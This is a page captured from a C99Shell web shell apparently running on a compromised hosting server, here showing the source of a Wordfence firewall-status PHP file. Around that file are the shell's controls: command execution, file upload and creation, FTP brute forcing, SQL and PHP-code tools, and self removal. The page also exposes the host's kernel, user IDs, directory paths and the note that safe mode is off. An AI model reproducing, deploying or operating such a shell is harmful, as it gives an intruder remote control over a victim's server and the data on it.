!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordfence/views/waf/   drwxr-xr-x
Free 180.09 GB of 490.84 GB (36.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     firewall-status.php (4.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if (!defined('WORDFENCE_VERSION')) { exit; }
/**
 * Presents the firewall status.
 *
 * Expects $firewall and $dashboard to be defined.
 *
 * @var wfFirewall $firewall The firewall state.
 * @var wfDashboard $dashboard Dashboard statistics.
 */
?>
<ul class="wf-block-list wf-block-list-horizontal">
<?php if ($firewall->firewallMode() == 'enabled' && $firewall->ruleMode() == wfFirewall::RULE_MODE_PREMIUM): ?>
    <li>
        <div class="wf-block-labeled-value wf-waf-status wf-waf-status-full-enabled">
            <div class="wf-block-labeled-value-label"><?php _e('Wordfence Firewall &amp; Premium Enabled''wordfence'); ?></div>
        </div>
    </li>
<?php else: ?>
    <li>
    <?php if ($firewall->firewallMode() == wfFirewall::FIREWALL_MODE_DISABLED): ?>
        <div class="wf-waf-status-disabled">
            <p><h3><?php _e('Wordfence Firewall Deactivated''wordfence'); ?></h3></p>
            <p><?php _e('The Wordfence Web Application Firewall is a PHP-based, application-level firewall that filters out malicious requests to your site. It is designed to run at the beginning of WordPress\' initialization to filter any attacks before plugins or themes can run any potentially vulnerable code.''wordfence'); ?></p>
            <p>
                <a class="wf-btn wf-btn-primary wf-btn-callout-subtle" href="#" target="_blank" rel="noopener noreferrer" id="waf-top-enable-firewall"><?php _e('Enable Firewall''wordfence'); ?></a>
                <script type="application/javascript">
                    (function($) {
                        $(function() {
                            $('#waf-top-enable-firewall').on('click', function(e) {
                                e.preventDefault();
                                e.stopPropagation();
    
                                WFAD.setOption('wafStatus', 'enabled', function() {
                                    window.location.reload(true);
                                });
                            });
                        });
                    })(jQuery);
                </script>
            </p>
        </div>
    <?php else: ?>
        <?php if ($firewall->firewallMode() == wfFirewall::FIREWALL_MODE_ENABLED): ?>
        <div class="wf-block-labeled-value wf-waf-status wf-waf-status-<?php echo esc_attr($firewall->firewallMode()); ?>">
            <div class="wf-block-labeled-value-value"><i class="wf-fa wf-fa-check" aria-hidden="true"></i></div>
            <div class="wf-block-labeled-value-label"><?php _e('Wordfence Firewall Activated''wordfence'); ?></div>
        </div>
        <?php elseif ($firewall->firewallMode() == wfFirewall::FIREWALL_MODE_LEARNING): ?>
            <div>
                <?php
                $learningMode 
$firewall->learningModeStatus();
                if (
function_exists('network_admin_url') && is_multisite()) { $optionsURL network_admin_url('admin.php?page=WordfenceWAF&subpage=waf_options'); }
                else { 
$optionsURL admin_url('admin.php?page=WordfenceWAF&subpage=waf_options'); }
                
?>
                <p><h3><?php echo ($learningMode === true __('Learning Mode Enabled''wordfence') : sprintf(__('Learning Mode Until %s''wordfence'), wfUtils::formatLocalTime(get_option('date_format'), $learningMode))); ?></h3></p>
                <p><?php _e('<i class="wf-fa wf-fa-lightbulb-o wf-tip" aria-hidden="true"></i> When you first install the Wordfence Web Application Firewall, it will be in learning mode. This allows Wordfence to learn about your site so that we can understand how to protect it and how to allow normal visitors through the firewall. We recommend you let Wordfence learn for a week before you enable the firewall.''wordfence'); ?></p>
                <p><a class="wf-btn wf-btn-primary wf-btn-callout-subtle" href="<?php echo esc_url($optionsURL); ?>"><?php _e('Manage Firewall''wordfence'); ?></a>&nbsp;&nbsp;<a class="wf-btn wf-btn-callout-subtle wf-btn-default" href="<?php echo wfSupportController::esc_supportURL(wfSupportController::ITEM_FIREWALL_WAF); ?>" target="_blank" rel="noopener noreferrer"><?php _e('Learn More''wordfence'); ?></a></p>
            </div>
        <?php endif; ?>
    <?php endif; ?>
    </li>
    <li>
    <?php if ($firewall->ruleMode() == wfFirewall::RULE_MODE_COMMUNITY): ?>
        <div>
            <p><h3><?php _e('Premium Protection Disabled''wordfence'); ?></h3></p>
            <p><?php printf(__('As a free Wordfence user, you are currently using the Community version of the Threat Defense Feed. Premium users are protected by an additional %d firewall rules and malware signatures. Upgrade to Premium today to improve your protection.''wordfence'), ($dashboard->tdfPremium $dashboard->tdfCommunity)); ?></p>
            <p><a class="wf-btn wf-btn-primary wf-btn-callout-subtle" href="https://www.wordfence.com/gnl1wafUpgrade/wordfence-signup/#premium-order-form" target="_blank" rel="noopener noreferrer"><?php _e('Upgrade to Premium''wordfence'); ?></a>&nbsp;&nbsp;<a class="wf-btn wf-btn-callout-subtle wf-btn-default" href="https://www.wordfence.com/gnl1wafLearn/wordfence-signup/" target="_blank" rel="noopener noreferrer"><?php _e('Learn More''wordfence'); ?></a></p>
        </div>
    <?php else: ?>
        <div class="wf-block-labeled-value wf-protection-status wf-protection-status-<?php echo esc_attr($firewall->ruleMode()); ?>">
            <div class="wf-block-labeled-value-value"><i class="wf-fa wf-fa-check" aria-hidden="true"></i></div>
            <div class="wf-block-labeled-value-label"><?php _e('Premium Protection Enabled''wordfence'); ?></div>
        </div>
    <?php endif; ?>
    </li>
<?php endif; ?>
</ul>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0243 ]--